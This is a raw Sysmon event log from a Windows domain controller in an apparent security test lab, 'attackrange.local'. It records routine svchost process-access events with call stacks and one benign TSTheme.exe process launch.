09:21:44.983{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055409Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.983{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055408Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.983{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1200-00000000FD01}484C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055407Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.983{5EBD8912-8CBF-6151-0C00-00000000FD01}8448C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055406Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.983{5EBD8912-8CBF-6151-0C00-00000000FD01}8448C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055405Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.983{5EBD8912-8CBF-6151-0C00-00000000FD01}8448C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055404Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.983{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1200-00000000FD01}484C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055403Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.983{5EBD8912-8CBF-6151-0C00-00000000FD01}844960C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1200-00000000FD01}484C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055402Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.983{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1200-00000000FD01}484C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055401Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.983{5EBD8912-8CBF-6151-0C00-00000000FD01}8448C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055400Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.983{5EBD8912-8CBF-6151-0C00-00000000FD01}844960C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1200-00000000FD01}484C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055399Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.983{5EBD8912-8CBF-6151-0C00-00000000FD01}844960C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1200-00000000FD01}484C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055398Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.983{5EBD8912-8CBF-6151-0C00-00000000FD01}844960C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1200-00000000FD01}484C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055397Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.983{5EBD8912-8CBF-6151-0C00-00000000FD01}844960C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1200-00000000FD01}484C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|c:\windows\system32\lsm.dll+23fc9|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055396Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.983{5EBD8912-8CBF-6151-0C00-00000000FD01}844960C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1200-00000000FD01}484C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23fc1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055395Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.983{5EBD8912-8CBF-6151-0C00-00000000FD01}844960C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055394Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.967{5EBD8912-8CBF-6151-0C00-00000000FD01}844960C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055393Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.967{5EBD8912-8CBF-6151-0C00-00000000FD01}844960C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055392Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.967{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8D28-6151-8A00-00000000FD01}620C:\Windows\system32\TSTheme.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055391Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.967{5EBD8912-8CBF-6151-0C00-00000000FD01}844960C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055390Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.967{5EBD8912-8CBF-6151-0C00-00000000FD01}8448C:\Windows\system32\svchost.exe{5EBD8912-8D28-6151-8A00-00000000FD01}620C:\Windows\system32\TSTheme.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+37172|c:\windows\system32\rpcss.dll+3df8d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055389Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.981{5EBD8912-8D28-6151-8A00-00000000FD01}620C:\Windows\System32\TSTheme.exe10.0.14393.4169 (rs1_release.210107-1130)TSTheme Server ModuleMicrosoft® Windows® Operating SystemMicrosoft CorporationTSThemeS.exeC:\Windows\system32\TSTheme.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{5EBD8912-8D28-6151-085E-080000000000}0x85e082HighMD5=D5E6B1DA9AEE1CC85A50894A07700B98,SHA256=3A22AAA677B8B658386F6A22ECFB36795DC1BE55AED591FEAA05CA8D36973464,IMPHASH=851EBF0BAEED8A212E02B93229FDC674{5EBD8912-8CBF-6151-0C00-00000000FD01}844C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000001055388Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.967{5EBD8912-8CBF-6151-0C00-00000000FD01}844960C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055387Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.967{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1200-00000000FD01}484C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055386Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.967{5EBD8912-8CBF-6151-0C00-00000000FD01}844960C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055385Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 